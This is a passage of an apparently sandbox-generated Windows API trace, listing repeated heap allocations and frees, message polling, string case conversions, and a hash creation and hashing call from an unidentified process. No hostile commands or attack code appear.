(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0255.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.309] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.309] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.309] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0255.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0255.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0255.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.309] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0255.309] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0255.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0255.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0255.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0255.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0255.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0255.310] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0255.310] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.310] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0255.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0255.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0255.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0255.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0255.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0255.310] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0255.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0255.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0255.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0255.310] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0255.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0255.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0255.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0255.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0255.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0255.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0255.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0255.311] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0255.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0255.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0255.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0255.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.311] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.311] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0255.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0255.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.312] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0255.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0255.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0255.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0255.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0255.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0255.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0255.312] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0255.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0255.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0255.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0255.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0255.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0255.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0255.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0255.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0255.313] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0255.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0255.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0255.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0255.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0255.313] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0255.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0255.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0255.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0255.313] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.313] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0255.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0255.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0255.314] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.314] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.314] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0255.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0255.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0255.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0255.314] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0255.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0255.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0255.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0255.314] CryptHashData (hHash=0xaa5760, pbData=0x24b17d8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0255.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0255.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0255.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0255.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0255.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0255.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0255.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0255.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0255.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0255.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0255.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0255.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0255.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0255.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0255.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0255.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0255.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0255.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0255.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0255.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0255.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0255.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0255.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0255.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0255.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0255.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0255.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0255.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0255.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0255.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0255.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0255.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0255.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0255.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0255.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0255.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0255.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0255.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0255.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0255.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0255.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0255.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0255.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0255.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0255.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0255.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0255.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0255.319] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0255.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0255.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0255.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0255.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0255.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0255.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0255.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0255.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0255.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0255.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0255.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0255.319] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0255.320] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0255.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0255.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0255.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0255.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0255.320] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0255.320] HeapFree (in: hHeap=0x25c0000, 